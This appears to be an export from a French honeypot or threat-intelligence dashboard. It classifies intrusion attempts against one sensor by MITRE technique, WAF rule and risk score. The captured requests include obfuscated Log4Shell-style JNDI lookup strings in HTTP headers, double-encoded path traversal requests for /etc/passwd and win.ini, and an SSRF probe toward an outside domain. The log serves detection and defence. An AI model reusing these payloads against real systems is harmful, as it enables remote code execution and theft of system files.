| TCP | 9200 · ELASTICSEARCH | elasticsearch | Scan de ports port scan syn · via ELASTICSEARCH:9200 · (reconnaissance) | Élevée | Moyen · 57 |
|
|
|
Étape
Reconnaissance
Chaîne
Reconnaissance
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
Corrélations
MITRE
T1046
TA0043
Protocole
GET / Requête Elasticsearch : / UA ${${uxf:1:a9:-j}${prdb:fw2n:rhs:-n}${2nu1:y1v:-d}${js2:d:-i}${q…
Émulateur
ELASTICSEARCH
WAF
16
Recommandation
Investiguer
Tags
Cible HTTP
GET
/
TLS SNI
—
Capteur
paris-1
|
|||||||
Preuve / Evidence
Méthode
GET
Port
9200
Chemin / cible
/
Service
ELASTICSEARCH
Pourquoi cette classification : Type « port_scan_syn » (signaux protocolaires) · confiance 100%
Confiance classification
100%
Corrélation +24
Risque capteur
Moyen
· 57
Confiance : Confiance 100 % — 3 tag(s) WAF
Protocole émulé
1
Signaux
MITRE-T1046
SIGMA-net-port-scan
Beh Scan Burst
Beh Multi Port 60S
Technique MITRE
T1046
Tactiques MITRE
TA0043
Motifs de détection (base)
CRS 933135
Ligne de requête
User-Agent
${${uxf:1:a9:-j}${prdb:fw2n:rhs:-n}${2nu1:y1v:-d}${js2:d:-i}${q:-:}${u:y:7x4:-l}${6:mao:-d}${f:z9pi:-a}${y:y0f:-p}${bhx:t:-:}${6x:0:-/}${f:dguv:-/}${zh0w:-U}${f8q:mq:9:-A}${l2x:4:ivkn:-l}${c:-0}${igw…
Règles WAF
rce-0
nosqli-3
sap-sapcontrol-path
Payload (extrait)
GET / HTTP/1.1
Host: 62.3.50.33:9200
Accept: */*
User-Agent: ${${uxf:1:a9:-j}${prdb:fw2n:rhs:-n}${2nu1:y1v:-d}${js2:d:-i}${q:
Requête brute (extrait)
GET / HTTP/1.1 Host: 62.3.50.33:9200 Accept: */* User-Agent: ${${uxf:1:a9:-j}${prdb:fw2n:rhs:-n}${2nu1:y1v:-d}${js2:d:-i}${q:-:}${u:y:7x4:-l}${6:mao:-d}${f:z9pi:-a}${y:y0f:-p}${bhx:t:-:}${6x:0:-/}${f:dguv:-/}${zh0w:-U}${f8q:mq:9:-A}${l2x:4:ivkn:-l}${c:-
|
|||||||
| TCP | 9200 · ELASTICSEARCH | elasticsearch | Scan de ports port scan syn · via ELASTICSEARCH:9200 · (reconnaissance) | Élevée | Moyen · 58 |
|
|
|
Étape
Reconnaissance
Chaîne
Reconnaissance
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
Corrélations
MITRE
T1046
TA0043
Protocole
GET / Requête Elasticsearch : / UA Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537…
Émulateur
ELASTICSEARCH
WAF
16
Recommandation
Investiguer
Tags
Cible HTTP
GET
/
TLS SNI
—
Capteur
paris-1
|
|||||||
Preuve / Evidence
Méthode
GET
Port
9200
Chemin / cible
/
Service
ELASTICSEARCH
Pourquoi cette classification : Type « port_scan_syn » (signaux protocolaires) · confiance 100%
Confiance classification
100%
Corrélation +24
Risque capteur
Moyen
· 58
Confiance : Confiance 100 % — 3 tag(s) WAF
Protocole émulé
1
Signaux
MITRE-T1046
SIGMA-net-port-scan
Beh Scan Burst
Beh Multi Port 60S
Technique MITRE
T1046
Tactiques MITRE
TA0043
Motifs de détection (base)
CRS 933135
SSRF Any-address SSRF
Ligne de requête
User-Agent
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
Règles WAF
rce-0
nosqli-3
sap-sapcontrol-path
Payload (extrait)
GET / HTTP/1.1 Host: 62.3.50.33:9200 Accept: */* User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.
Requête brute (extrait)
GET / HTTP/1.1 Host: 62.3.50.33:9200 Accept: */* User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36 X-Forwarded-For: ${${a7:5yfg:tw63:-j}${sk:-n}${fzd:-d}${b:t:zib:-i}${wufl
|
|||||||
| TCP | 85 · HTTP | http | Scan de ports port scan syn · via HTTP:85 · (reconnaissance) · → /upload_test.txt | Élevée | Moyen · 57 |
|
|
|
Étape
Reconnaissance
Chaîne
Reconnaissance
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
Corrélations
MITRE
T1046
TA0043
Protocole
POST /upload_test.txt UA Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537…
Émulateur
HTTP
WAF
17
Recommandation
Investiguer
Tags
Cible HTTP
POST
/upload_test.txt
TLS SNI
—
Capteur
paris-1
|
|||||||
Preuve / Evidence
Méthode
POST
Port
85
Chemin / cible
/upload_test.txt
Service
HTTP
Pourquoi cette classification : Type « port_scan_syn » (signaux protocolaires) · confiance 100%
Confiance classification
100%
Corrélation +16
Risque capteur
Moyen
· 57
Confiance : Confiance 100 % — 3 tag(s) WAF
Signaux
MITRE-T1046
SIGMA-net-port-scan
Beh Multi Port 60S
Technique MITRE
T1046
Tactiques MITRE
TA0043
Motifs de détection (base)
SSRF Any-address SSRF
Ligne de requête
User-Agent
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
Règles WAF
rce-0
nosqli-3
body-entropy
Payload (extrait)
POST /upload_test.txt HTTP/1.1 Host: ip-62-3-50-33.v4.isp.servpersosystems.net:85 Accept: */* User-Agent: Mozilla/5.0 (Macint
Requête brute (extrait)
POST /upload_test.txt HTTP/1.1 Host: ip-62-3-50-33.v4.isp.servpersosystems.net:85 Accept: */* User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36 Content-Type: application/oc |
|||||||
| TCP | 82 · HTTP | http | Scan de ports port scan syn · via HTTP:82 · (reconnaissance) | Élevée | Moyen · 55 |
|
|
|
Étape
Reconnaissance
Chaîne
Reconnaissance
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
Corrélations
MITRE
T1046
TA0043
Protocole
GET / UA Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537…
Émulateur
HTTP
WAF
16
Recommandation
Investiguer
Tags
Cible HTTP
GET
/
TLS SNI
—
Capteur
paris-1
|
|||||||
Preuve / Evidence
Méthode
GET
Port
82
Chemin / cible
/
Service
HTTP
Pourquoi cette classification : Type « port_scan_syn » (signaux protocolaires) · confiance 100%
Confiance classification
100%
Corrélation +10
Risque capteur
Moyen
· 55
Confiance : Confiance 100 % — 3 tag(s) WAF
Signaux
MITRE-T1046
SIGMA-net-port-scan
Beh Multi Port 60S
Technique MITRE
T1046
Tactiques MITRE
TA0043
Motifs de détection (base)
SSRF Any-address SSRF
Ligne de requête
User-Agent
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
Règles WAF
rce-0
nosqli-3
sap-sapcontrol-path
Payload (extrait)
GET / HTTP/1.1 Host: ip-62-3-50-33.v4.isp.servpersosystems.net:82 Accept: */* User-Agent: Mozilla/5.0 (Macintosh; Intel Mac O
Requête brute (extrait)
GET / HTTP/1.1 Host: ip-62-3-50-33.v4.isp.servpersosystems.net:82 Accept: */* User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36 |
|||||||
| TCP | 81 · HTTP | http | Traversal LFI lfi path traversal · via HTTP:81 · (tentative d'exploit) · → /cgi-bin/%%32%65%%32%65/%%32%65%%32%65/%%32%65%… | Élevée | Élevé · 70 |
|
|
|
Étape
Tentative d'exploit
Chaîne
Reconnaissance
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
Corrélations
MITRE
T1083
TA0001
TA0002
Protocole
GET /cgi-bin/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/… UA Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537…
Émulateur
HTTP
WAF
35
Recommandation
Investiguer
Tags
Cible HTTP
GET
/cgi-bin/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/Windows/win.ini
TLS SNI
—
Capteur
paris-1
|
|||||||
Preuve / Evidence
Méthode
GET
Port
81
Chemin / cible
/cgi-bin/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/Windows/win.ini
Service
HTTP
Pourquoi cette classification : Sonde fichier sensible: traversal ../ · Règle WAF « lfi-0 » · Traversal / LFI dans le chemin · confiance 100%
Confiance classification
100%
Corrélation +10
Risque capteur
Élevé
· 70
Confiance : Confiance 100 % — Motif catalogue confirmé · 5 tag(s) WAF
Protocole émulé
1
Signaux
Http Lfi
pat-0715
CRS-930100-sub
Upstream
Technique MITRE
T1083
Tactiques MITRE
TA0001
TA0002
Motifs de détection (base)
CRS 930150 boot ini
Ligne de requête
User-Agent
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
Règles WAF
lfi-0
lfi-1
rce-0
nosqli-3
Payload (extrait)
GET /cgi-bin/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/Windows/wi
Requête brute (extrait)
GET /cgi-bin/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/Windows/win.ini HTTP/1.1 Host: 62.3.50.33:81 Accept: */* User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 |
|||||||
| TCP | 81 · HTTP | http | Traversal LFI lfi path traversal · via HTTP:81 · (tentative d'exploit) · → /cgi-bin/%%32%65%%32%65/%%32%65%%32%65/%%32%65%… | Élevée | Élevé · 70 |
|
|
|
Étape
Tentative d'exploit
Chaîne
Reconnaissance
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
Corrélations
MITRE
T1083
TA0001
TA0002
Protocole
GET /cgi-bin/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/… UA Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537…
Émulateur
HTTP
WAF
35
Recommandation
Investiguer
Tags
Cible HTTP
GET
/cgi-bin/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/etc/passwd
TLS SNI
—
Capteur
paris-1
|
|||||||
Preuve / Evidence
Méthode
GET
Port
81
Chemin / cible
/cgi-bin/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/etc/passwd
Service
HTTP
Pourquoi cette classification : Sonde fichier sensible: traversal ../ · Règle WAF « lfi-0 » · Traversal / LFI dans le chemin · confiance 100%
Confiance classification
100%
Corrélation +10
Risque capteur
Élevé
· 70
Confiance : Confiance 100 % — Motif catalogue confirmé · 5 tag(s) WAF
Protocole émulé
1
Signaux
MITRE-T1083
Http Lfi
pat-0716
pat-0137
Technique MITRE
T1083
Tactiques MITRE
TA0001
TA0002
Motifs de détection (base)
CRS 930160 etc passwd
LFI path /etc/passwd
Ligne de requête
User-Agent
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
Règles WAF
lfi-0
lfi-1
rce-0
nosqli-3
Payload (extrait)
GET /cgi-bin/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/etc/passwd
Requête brute (extrait)
GET /cgi-bin/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/etc/passwd HTTP/1.1 Host: 62.3.50.33:81 Accept: */* User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHT |
|||||||
| TCP | 7003 · HTTP | http | SSRF interne ssrf internal · via HTTP:7003 · (tentative d'exploit) | Élevée | Moyen · 56 |
|
|
|
Étape
Tentative d'exploit
Chaîne
Reconnaissance
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
Corrélations
MITRE
TA0001
TA0001
TA0002
Protocole
GET / UA Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537…
Émulateur
HTTP
WAF
16
Recommandation
Investiguer
Tags
Cible HTTP
GET
/
TLS SNI
—
Capteur
paris-1
|
|||||||
Preuve / Evidence
Méthode
GET
Port
7003
Chemin / cible
/
Service
HTTP
Pourquoi cette classification : Type « ssrf_internal » (signaux protocolaires) · confiance 54%
Confiance classification
64%
Corrélation +10
Risque capteur
Moyen
· 56
Confiance : Confiance 54 % — Motif catalogue confirmé · 3 tag(s) WAF
Protocole émulé
1
Signaux
CRS-920350
Technique MITRE
TA0001
Tactiques MITRE
TA0001
TA0002
Motifs de détection (base)
SSRF Any-address SSRF
Ligne de requête
User-Agent
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
Règles WAF
rce-0
nosqli-3
sap-sapcontrol-path
Payload (extrait)
GET / HTTP/1.1 Host: 62.3.50.33:7003 Accept: */* User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.
Requête brute (extrait)
GET / HTTP/1.1 Host: 62.3.50.33:7003 Accept: */* User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36 |
|||||||
| TCP | 7003 · HTTP | http | SSRF interne ssrf internal · via HTTP:7003 · (tentative d'exploit) · → /http%3A%2F%2Fw00te8b527c1d.com | Élevée | Élevé · 65 |
|
|
|
Étape
Tentative d'exploit
Chaîne
Reconnaissance
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
Corrélations
MITRE
TA0001
TA0001
TA0002
Protocole
GET /http%3A%2F%2Fw00te8b527c1d.com UA Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537…
Émulateur
HTTP
WAF
25
Recommandation
Investiguer
Tags
Cible HTTP
GET
/http%3A%2F%2Fw00te8b527c1d.com
TLS SNI
—
Capteur
paris-1
|
|||||||
Preuve / Evidence
Méthode
GET
Port
7003
Chemin / cible
/http%3A%2F%2Fw00te8b527c1d.com
Service
HTTP
Pourquoi cette classification : Type « ssrf_internal » (signaux protocolaires) · confiance 54%
Confiance classification
64%
Corrélation +10
Risque capteur
Élevé
· 65
Confiance : Confiance 54 % — Motif catalogue confirmé · 4 tag(s) WAF
Protocole émulé
1
Signaux
CRS-920350
Technique MITRE
TA0001
Tactiques MITRE
TA0001
TA0002
Motifs de détection (base)
SSRF Any-address SSRF
Ligne de requête
User-Agent
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
Règles WAF
rce-0
ssrf-3
nosqli-3
Payload (extrait)
GET /http%3A%2F%2Fw00te8b527c1d.com HTTP/1.1 Host: ip-62-3-50-33.v4.isp.servpersosystems.net:7003 Accept: */* User-Agent: Moz
Requête brute (extrait)
GET /http%3A%2F%2Fw00te8b527c1d.com HTTP/1.1 Host: ip-62-3-50-33.v4.isp.servpersosystems.net:7003 Accept: */* User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36 |
|||||||
| TCP | 81 · HTTP | http | SSRF interne ssrf internal · via HTTP:81 · (tentative d'exploit) | Élevée | Moyen · 54 |
|
|
|
Étape
Tentative d'exploit
Chaîne
Reconnaissance
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
Corrélations
MITRE
TA0001
TA0001
TA0002
Protocole
GET / UA Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537…
Émulateur
HTTP
WAF
16
Recommandation
Investiguer
Tags
Cible HTTP
GET
/
TLS SNI
—
Capteur
paris-1
|
|||||||
Preuve / Evidence
Méthode
GET
Port
81
Chemin / cible
/
Service
HTTP
Pourquoi cette classification : Type « ssrf_internal » (signaux protocolaires) · confiance 54%
Confiance classification
64%
Corrélation +10
Risque capteur
Moyen
· 54
Confiance : Confiance 54 % — Motif catalogue confirmé · 3 tag(s) WAF
Protocole émulé
1
Signaux
CRS-920350
Technique MITRE
TA0001
Tactiques MITRE
TA0001
TA0002
Motifs de détection (base)
SSRF Any-address SSRF
Ligne de requête
User-Agent
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
Règles WAF
rce-0
nosqli-3
sap-sapcontrol-path
Payload (extrait)
GET / HTTP/1.1 Host: 62.3.50.33:81 Accept: */* User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36
Requête brute (extrait)
GET / HTTP/1.1 Host: 62.3.50.33:81 Accept: */* User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36 |
|||||||